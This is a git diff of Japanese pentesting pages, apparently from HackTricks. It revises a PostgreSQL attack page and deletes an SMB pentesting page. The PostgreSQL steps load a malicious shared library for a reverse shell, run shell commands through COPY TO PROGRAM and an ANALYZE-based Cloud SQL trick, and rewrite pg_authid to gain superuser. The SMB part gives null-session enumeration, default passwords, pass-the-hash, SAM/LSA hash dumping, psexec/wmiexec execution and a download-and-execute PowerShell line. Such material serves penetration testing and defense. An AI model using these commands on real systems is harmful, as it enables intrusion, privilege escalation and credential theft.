`dynamic_library_path`の値を、データベースを実行している`postgres`ユーザーによって書き込み可能なディレクトリ(例: `/tmp/`ディレクトリ)に設定し、そこに悪意のある`.so`オブジェクトをアップロードします。次に、`session_preload_libraries`変数に新しくアップロードしたライブラリを含めることで、PostgreSQLサーバーにそれを読み込ませます。
攻撃手順は次のとおりです
攻撃手順は次のとおりです:
1. 元の `postgresql.conf` をダウンロード
2. `dynamic_library_path` の値に `/tmp/` ディレクトリを含めます。例: `dynamic_library_path = '/tmp:$libdir'`
3. `session_preload_libraries` の値に悪意のあるライブラリ名を含めます。例: `session_preload_libraries = 'payload.so'`
4. `SELECT version()` クエリを介して主要な PostgreSQL バージョンを確認
5. 正しい PostgreSQL 開発パッケージで悪意のあるライブラリコードをコンパイル サンプルコード
1. 元の`postgresql.conf`をダウンロード
2. `dynamic_library_path`の値に`/tmp/`ディレクトリを含める、例: `dynamic_library_path = '/tmp:$libdir'`
3. `session_preload_libraries`の値に悪意のあるライブラリ名を含める、例: `session_preload_libraries = 'payload.so'`
4. `SELECT version()`クエリを介して主要なPostgreSQLバージョンを確認
5. 正しいPostgreSQL開発パッケージで悪意のあるライブラリコードをコンパイル サンプルコード:
```c
#include <stdio.h>
@ -508,16 +509,16 @@ execve("/bin/bash", argv, NULL);
}
```
コードをコンパイル
コードをコンパイル:
```bash
gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
```
6. ステップ 2-3 で作成した悪意のある `postgresql.conf` をアップロードし、元のものを上書き
7. ステップ 5 `payload.so` `/tmp` ディレクトリにアップロード
8. サーバーを再起動するか、`SELECT pg_reload_conf()` クエリを呼び出してサーバー設定をリロード
9. 次の DB 接続時に、リバースシェル接続を受け取ります。
6. ステップ2-3で作成した悪意のある`postgresql.conf`をアップロードし、元のものを上書き
7. ステップ5の`payload.so``/tmp`ディレクトリにアップロード
8. サーバーを再起動するか、`SELECT pg_reload_conf()`クエリを呼び出してサーバー設定をリロード
9. 次のDB接続時に、リバースシェル接続を受け取ります。
## **Postgres Privesc**
@ -525,9 +526,9 @@ gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so
#### **Grant**
[**ドキュメント**](https://www.postgresql.org/docs/13/sql-grant.html) によると: _**`CREATEROLE`** 権限を持つロールは、**スーパーユーザー** でない **任意のロール** のメンバーシップを **付与または取り消すことができます**。_
[**ドキュメント**](https://www.postgresql.org/docs/13/sql-grant.html)によると: _**`CREATEROLE`** 権限を持つロールは、**スーパーユーザー**でない任意のロールへのメンバーシップを**付与または取り消すことができます**。_
したがって、**`CREATEROLE`** 権限を持っている場合、他の **ロール**(スーパーユーザーでない)へのアクセスを付与することができ、ファイルの読み書きやコマンドの実行のオプションを得ることができます
したがって、**`CREATEROLE`** 権限を持っている場合、他の**ロール**(スーパーユーザーでない)へのアクセスを付与することができ、ファイルの読み書きやコマンドの実行のオプションを得ることができます:
```sql
# Access to execute commands
GRANT pg_execute_server_program TO username;
@ -549,7 +550,7 @@ ALTER USER user_name WITH PASSWORD 'new_password';
```sql
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
```
> [!NOTE]
> [!TIP]
> これは通常、**`pg_hba.conf`**ファイルの以下の行のおかげで可能です:
>
> ```bash
@ -569,19 +570,19 @@ COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username>
<figure><img src="../images/image (537).png" alt=""><figcaption></figcaption></figure>
この考えを、**INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)コマンドが**インデックス関数を持つテーブル**で実行されるとき、**関数**が**テーブル**の**所有者の権限**でコマンドの一部として**呼び出される**という事実と結びつけると、関数を使ってインデックスを作成し、そのテーブルに対して**スーパーユーザー**に所有者権限を与え、その後悪意のある関数を使ってテーブルに対してANALYZEを実行することが可能になります。これは所有者の権限を使用してコマンドを実行できるからです。
この考えを、**INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)コマンドが**インデックス関数を持つテーブル**で実行されるとき、**関数**が**テーブル**の**所有者の権限**でコマンドの一部として**呼び出される**という事実と結びつけると、関数を使ってインデックスを作成し、そのテーブルに対して**スーパーユーザー**に所有者権限を与え、その後悪意のある関数を使ってテーブルに対してANALYZEを実行することが可能になります。これは所有者の権限を使用してコマンドを実行できるからです。
```c
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
save_sec_context | SECURITY_RESTRICTED_OPERATION);
```
#### エクスプロイト
#### Exploitation
1. 新しいテーブルを作成します。
2. インデックス関数にデータを提供するために、テーブルにいくつかの無関係なコンテンツを挿入します。
3. コード実行ペイロードを含む悪意のあるインデックス関数を開発し、不正なコマンドを実行できるようにします。
4. テーブルの所有者を「cloudsqladmin」にALTERします。これは、Cloud SQLがデータベースを管理および維持するために専用に使用するGCPのスーパーユーザーロールです。
5. テーブルにANALYZE操作を実行します。このアクションにより、PostgreSQLエンジンはテーブルの所有者「cloudsqladmin」のユーザーコンテキストに切り替わります。その結果、悪意のあるインデックス関数が「cloudsqladmin」の権限で呼び出され、以前は不正だったシェルコマンドの実行が可能になります。
3. コード実行ペイロードを含む悪意のあるインデックス関数を開発し、無許可のコマンドを実行できるようにします。
4. テーブルの所有者を「cloudsqladmin」にALTERします。これは、Cloud SQLがデータベースを管理および維持するために専用GCPのスーパーユーザーロールです。
5. テーブルにANALYZE操作を実行します。このアクションにより、PostgreSQLエンジンはテーブルの所有者「cloudsqladmin」のユーザーコンテキストに切り替わります。その結果、悪意のあるインデックス関数が「cloudsqladmin」の権限で呼び出され、以前は無許可だったシェルコマンドの実行が可能になります。
PostgreSQLでは、このフローは次のようになります
```sql
@ -604,13 +605,13 @@ LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM
ANALYZE public.temp_table;
```
その後、`shell_commands_results` テーブルには実行されたコードの出力が含まれます
その後、`shell_commands_results` テーブルには実行されたコードの出力が含まれます:
```
uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
```
### ローカルログイン
一部の誤設定された postgresql インスタンスでは、任意のローカルユーザーのログインが許可される場合があります。**`dblink` 関数**を使用して 127.0.0.1 からローカルに接続することが可能です。
一部の設定ミスがあるpostgresqlインスタンスでは、任意のローカルユーザーのログインが許可される場合があります。**`dblink`関数**を使用して127.0.0.1からローカルにログインすることが可能です。
```sql
\du * # Get Users
\l # Get databases
@ -623,13 +624,13 @@ dbname=somedb',
RETURNS (result TEXT);
```
> [!WARNING]
> 前のクエリが機能するためには、**関数 `dblink` が存在する必要があります**。存在しない場合は、次のコマンドで作成を試みることができます。
> 注意してください、前のクエリが機能するためには**`dblink`関数が存在する必要があります**。存在しない場合は、次のコマンドで作成を試みることができます。
>
> ```sql
> CREATE EXTENSION dblink;
> ```
より多くの権限を持つユーザーのパスワードを持っているが、そのユーザーが外部IPからのログインを許可されていない場合、次の関数を使用してそのユーザーとしてクエリを実行できます
もし、より多くの権限を持つユーザーのパスワードを持っているが、そのユーザーが外部IPからのログインを許可されていない場合、次の関数を使用してそのユーザーとしてクエリを実行できます
```sql
SELECT * FROM dblink('host=127.0.0.1
user=someuser
@ -664,7 +665,7 @@ PERFORM dblink_disconnect();
</code></pre>
[**ドキュメントで説明されているように**](https://www.postgresql.org/docs/current/sql-createfunction.html)、**SECURITY DEFINERを持つ関数は**、**それを所有するユーザーの権限で実行されます**。したがって、関数が**SQLインジェクションに対して脆弱である**か、**攻撃者によって制御されるパラメータで特権的なアクションを行っている**場合、それを悪用して**Postgres内で権限を昇格させる**ことができます。
[**ドキュメントで説明されているように**](https://www.postgresql.org/docs/current/sql-createfunction.html)、**SECURITY DEFINERを持つ関数は**、**それを所有するユーザーの権限で実行されます**。したがって、関数が**SQLインジェクションに対して脆弱である**か、**攻撃者によって制御されるパラメータで特権的なアクションを実行している**場合、それを悪用して**Postgres内で権限を昇格させる**ことができます。
前のコードの4行目に、関数が**SECURITY DEFINER**フラグを持っていることがわかります。
```sql
@ -687,8 +688,8 @@ WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
### 内部PostgreSQLテーブルの上書きによる特権昇格
> [!NOTE]
> 次の特権昇格ベクターは、すべてのステップがネストされたSELECT文を通じて実行できるため、制約のあるSQLiコンテキストで特に有用です。
> [!TIP]
> 次の特権昇格ベクターは、すべてのステップがネストされたSELECT文を通じて実行できるため、制約のあるSQLiコンテキストで特に便利です。
PostgreSQLサーバーファイルを**読み書き**できる場合、内部の`pg_authid`テーブルに関連付けられたPostgreSQLのディスク上のファイルードを上書きすることで**スーパーユーザー**になることができます。
@ -696,14 +697,14 @@ PostgreSQLサーバーファイルを**読み書き**できる場合、内部の
攻撃手順は次のとおりです:
1. PostgreSQLデータディレクトリを取得しま
2. `pg_authid`テーブルに関連付けられたファイルノードへの相対パスを取得しま
3. `lo_*`関数を通じてファイルノードをダウンロードしま
4. `pg_authid`テーブルに関連付けられたデータ型を取得しま
1. PostgreSQLデータディレクトリを取得す
2. `pg_authid`テーブルに関連付けられたファイルノードへの相対パスを取得す
3. `lo_*`関数を通じてファイルノードをダウンロードす
4. `pg_authid`テーブルに関連付けられたデータ型を取得す
5. [PostgreSQLファイルードエディタ](https://github.com/adeadfed/postgresql-filenode-editor)を使用して[ファイルノードを編集](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table)し、すべての`rol*`ブールフラグを1に設定して完全な権限を付与します。
6. `lo_*`関数を介して編集したファイルノードを再アップロードし、ディスク上の元のファイルを上書きします
7. _(オプション)_ 高コストのSQLクエリを実行してメモリ内のテーブルキャッシュをクリアします
8. これで、フルスーパーメンバーの権限を持つことになります。
6. `lo_*`関数を介して編集したファイルノードを再アップロードし、ディスク上の元のファイルを上書きします
7. _(オプション)_ 高コストのSQLクエリを実行してメモリ内のテーブルキャッシュをクリアします
8. これで、フルスーパーユーザーの権限を持つことになります。
## **POST**
```
@ -715,7 +716,7 @@ msf> use exploit/windows/postgres/postgres_payload
```
### logging
_**postgresql.conf**_ ファイル内で、次のように変更することで postgresql ログを有効にできます:
_inside the **postgresql.conf**_ ファイル内で、次のように変更することで postgresql ログを有効にできます:
```bash
log_statement = 'all'
log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
@ -724,7 +725,7 @@ sudo service postgresql restart
#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/
#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
```
次に、**サービスを再起動**します。
その後、**サービスを再起動**します。
### pgadmin

532
src/network-services-pentesting/pentesting-smb.md
View File

@ -1,532 +0,0 @@
# 139,445 - Pentesting SMB
{{#include ../banners/hacktricks-training.md}}
## **ポート 139**
_**ネットワーク基本入出力システム**_** (NetBIOS)** は、アプリケーション、PC、およびデスクトップがローカルエリアネットワーク (LAN) 内でネットワークハードウェアと相互作用し、**ネットワークを介してデータの送信を促進する**ために設計されたソフトウェアプロトコルです。NetBIOSネットワーク上で動作するソフトウェアアプリケーションの識別と位置は、最大16文字の長さを持ち、コンピュータ名とは異なることが多いNetBIOS名を通じて達成されます。2つのアプリケーション間のNetBIOSセッションは、1つのアプリケーションクライアントとして機能が**TCPポート139**を利用して、別のアプリケーション(サーバーとして機能)を「呼び出す」コマンドを発行することで開始されます。
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
技術的には、ポート139は「NBT over IP」と呼ばれ、ポート445は「SMB over IP」として識別されます。略語**SMB**は「**Server Message Blocks**」の略で、現代では**Common Internet File System (CIFS)**としても知られています。アプリケーション層のネットワークプロトコルとして、SMB/CIFSは主にファイル、プリンター、シリアルポートへの共有アクセスを可能にし、ネットワーク上のード間のさまざまな通信形態を促進するために利用されます。
例えば、Windowsの文脈では、SMBはTCP/IP上で直接動作できることが強調されており、ポート445を利用することでTCP/IP上のNetBIOSの必要性が排除されます。対照的に、異なるシステムではポート139の使用が観察され、SMBがTCP/IP上のNetBIOSと共に実行されていることを示しています。
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
**Server Message Block (SMB)**プロトコルは、**クライアント-サーバー**モデルで動作し、**ファイル**、ディレクトリ、およびプリンタやルータなどの他のネットワークリソースへの**アクセス**を規制するために設計されています。主に**Windows**オペレーティングシステムシリーズ内で利用され、SMBは後方互換性を確保し、Microsoftのオペレーティングシステムの新しいバージョンを実行しているデバイスが古いバージョンを実行しているデバイスとシームレスに相互作用できるようにします。さらに、**Samba**プロジェクトは無料のソフトウェアソリューションを提供し、**Linux**およびUnixシステムでのSMBの実装を可能にし、SMBを通じたクロスプラットフォーム通信を促進します。
**ローカルファイルシステムの任意の部分**を表す共有は、SMBサーバーによって提供され、クライアントに対してサーバーの実際の構造とは部分的に**独立した**階層を表示します。**アクセス制御リスト (ACL)**は、**アクセス権**を定義し、**`execute`**、**`read`**、および**`full access`**などの属性を含むユーザー権限に対する**細かい制御**を可能にします。これらの権限は、共有に基づいて個々のユーザーまたはグループに割り当てることができ、サーバー上のローカル権限とは異なります。
### IPC$ Share
IPC$共有へのアクセスは、匿名のヌルセッションを通じて取得でき、名前付きパイプを介して公開されたサービスと相互作用することができます。この目的には、ユーティリティ`enum4linux`が便利です。適切に利用することで、以下の情報を取得できます:
- オペレーティングシステムに関する情報
- 親ドメインの詳細
- ローカルユーザーおよびグループの一覧
- 利用可能なSMB共有に関する情報
- 有効なシステムセキュリティポリシー
この機能は、ネットワーク管理者やセキュリティ専門家がネットワーク上のSMB (Server Message Block)サービスのセキュリティ姿勢を評価するために重要です。`enum4linux`は、ターゲットシステムのSMB環境の包括的なビューを提供し、潜在的な脆弱性を特定し、SMBサービスが適切に保護されていることを確認するために不可欠です。
```bash
enum4linux -a target_ip
```
上記のコマンドは、`target_ip`で指定されたターゲットに対して完全な列挙を実行するために`enum4linux`がどのように使用されるかの例です。
## NTLMとは
NTLMが何であるか知らない場合や、その仕組みや悪用方法を知りたい場合は、**NTLM**に関するこのページが非常に興味深いでしょう。ここでは**このプロトコルの仕組みと、それを利用する方法が説明されています:**
{{#ref}}
../windows-hardening/ntlm/
{{#endref}}
## **サーバー列挙**
### **ホストを検索するために**ネットワークをスキャンする:
```bash
nbtscan -r 192.168.0.1/24
```
### SMBサーバーバージョン
SMBバージョンの可能なエクスプロイトを探すには、どのバージョンが使用されているかを知ることが重要です。この情報が他の使用されているツールに表示されない場合は、次のことができます
- **MSF**補助モジュール _**auxiliary/scanner/smb/smb_version**_ を使用する
- またはこのスクリプトを使用する:
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **検索エクスプロイト**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **可能な** 認証情報
| **ユーザー名** | **一般的なパスワード** |
| -------------------- | ----------------------------------------- |
| _(空白)_ | _(空白)_ |
| ゲスト | _(空白)_ |
| 管理者, admin | _(空白)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### ブルートフォース
- [**SMB ブルートフォース**](../generic-methodologies-and-resources/brute-force.md#smb)
### SMB 環境情報
### 情報を取得する
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>
#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information
#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### ユーザー、グループ、およびログイン中のユーザーの列挙
この情報はすでにenum4linuxおよびenum4linux-ngから収集されているはずです。
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### ローカルユーザーの列挙
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
ワンライナー
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - ローカルユーザーの列挙
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **LSARPCとSAMR rpcclientの列挙**
{{#ref}}
pentesting-smb/rpcclient-enumeration.md
{{#endref}}
### LinuxからのGUI接続
#### ターミナルで:
`xdg-open smb://cascade.htb/`
#### ファイルブラウザウィンドウnautilus, thunarなど
`smb://friendzone.htb/general/`
## 共有フォルダの列挙
### 共有フォルダのリスト
アクセスできるものがないか確認することを常にお勧めします。資格情報がない場合は、**null** **資格情報/ゲストユーザー**を使用してみてください。
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list
crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```
### **共有フォルダーに接続/リスト**
```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls' to list recursively with smbclient
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **手動でWindows共有を列挙し、接続する**
ホストマシンの共有を表示することが制限されている可能性があり、リストを表示しようとすると接続できる共有がないように見えることがあります。そのため、共有に手動で接続してみる価値があるかもしれません。共有を手動で列挙するには、有効なセッションヌルセッションまたは有効な資格情報を使用しているときに、NT_STATUS_ACCESS_DENIEDやNT_STATUS_BAD_NETWORK_NAMEのような応答を探すと良いでしょう。これらは、共有が存在するがアクセスできないか、共有がまったく存在しないかを示す可能性があります。
Windowsターゲットの一般的な共有名は次のとおりです。
- C$
- D$
- ADMIN$
- IPC$
- PRINT$
- FAX$
- SYSVOL
- NETLOGON
_**Network Security Assessment 3rd edition**_からの一般的な共有名
次のコマンドを使用して接続を試みることができます。
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
このスクリプト(ヌルセッションを使用)
```bash
#/bin/bash
ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')
for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')
if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
```
例示
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Windowsからの共有を列挙する / サードパーティツールなし**
PowerShell
```bash
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMDコンソール
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC スナップイン (グラフィカル)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (グラフィカル)、`\\<ip>\` を入力して、利用可能な非隠し共有を表示します。
### 共有フォルダーをマウントする
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **ファイルをダウンロード**
資格情報/Pass-the-Hashで接続する方法については、前のセクションを参照してください。
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```
```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```
コマンド:
- mask: ディレクトリ内のファイルをフィルタリングするために使用されるマスクを指定します(例: "" すべてのファイル)
- recurse: 再帰をオンに切り替えます(デフォルト: オフ)
- prompt: ファイル名のプロンプトをオフに切り替えます(デフォルト: オン)
- mget: ホストからクライアントマシンにマスクに一致するすべてのファイルをコピーします
(_smbclientのマニュアルページからの情報_)
### ドメイン共有フォルダ検索
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
- [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) スパイダー。
- `-M spider_plus [--share <share_name>]`
- `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
特に興味深いのは、**`Registry.xml`** というファイルで、これは **autologon** を使用して構成されたユーザーの **パスワード** を含む可能性があります。また、**`web.config`** ファイルも、認証情報を含んでいます。
- [**PowerHuntShares**](https://github.com/NetSPI/PowerHuntShares)
- `IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")`
- `Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test`
> [!NOTE]
> **SYSVOL共有** は、ドメイン内のすべての認証ユーザーによって **読み取り可能** です。そこには、さまざまなバッチ、VBScript、およびPowerShellの **スクリプト****見つかる** かもしれません。\
> その中の **スクリプト****確認** するべきで、**パスワード** などの機密情報を **見つける** 可能性があります。
## レジストリの読み取り
発見した認証情報を使用して **レジストリを読み取る** ことができるかもしれません。Impacket の **`reg.py`** を使用して試すことができます。
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## ポストエクスプロイト
**Samba** サーバーの **デフォルト設定** は通常 `/etc/samba/smb.conf` にあり、いくつかの **危険な設定** が含まれている可能性があります:
| **設定** | **説明** |
| --------------------------- | --------------------------------------------------------------- |
| `browseable = yes` | 現在の共有で利用可能な共有をリスト表示することを許可しますか? |
| `read only = no` | ファイルの作成と変更を禁止しますか? |
| `writable = yes` | ユーザーがファイルを作成および変更することを許可しますか? |
| `guest ok = yes` | パスワードを使用せずにサービスに接続することを許可しますか? |
| `enable privileges = yes` | 特定のSIDに割り当てられた権限を尊重しますか |
| `create mask = 0777` | 新しく作成されたファイルにどの権限を割り当てる必要がありますか? |
| `directory mask = 0777` | 新しく作成されたディレクトリにどの権限を割り当てる必要がありますか? |
| `logon script = script.sh` | ユーザーのログイン時に実行する必要があるスクリプトは何ですか? |
| `magic script = script.sh` | スクリプトが終了したときに実行する必要があるスクリプトはどれですか? |
| `magic output = script.out` | マジックスクリプトの出力をどこに保存する必要がありますか? |
コマンド `smbstatus`**サーバー****接続しているユーザー** に関する情報を提供します。
## Kerberosを使用して認証する
ツール **smbclient****rpcclient** を使用して **kerberos****認証** できます:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **コマンドの実行**
### **crackmapexec**
crackmapexecは、**mmcexec、smbexec、atexec、wmiexec**のいずれかを**悪用して**コマンドを実行できます。**wmiexec**が**デフォルト**の方法です。使用したいオプションを`--exec-method`パラメータで指定できます:
```bash
apt-get install crackmapexec
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
両方のオプションは、**新しいサービスを作成します**SMB経由で _\pipe\svcctl_ を使用)被害者のマシンで、これを使用して**何かを実行します****psexec**は**実行可能ファイルをADMIN$共有にアップロードし、**smbexec**は**cmd.exe/powershell.exe**を指し、引数にペイロードを入れます --**ファイルレス技術-**-)。\
**詳細情報**は[**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)と[**smbexec**](../windows-hardening/ntlm/smbexec.md)を参照してください。\
**kali**では、/usr/share/doc/python3-impacket/examples/にあります。
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
**パラメーター**`-k`を使用すると、**kerberos**に対して認証できます。
### [wmiexec](../windows-hardening/ntlm/wmiexec.md)/dcomexec
ディスクに触れず、新しいサービスを実行せずに、**ポート135**を介してDCOMを使用してコマンドシェルを stealthily 実行します。\
**kali**では、/usr/share/doc/python3-impacket/examples/にあります。
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
**パラメーター**`-k`を使用すると、**NTLM**の代わりに**kerberos**に対して認証できます。
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
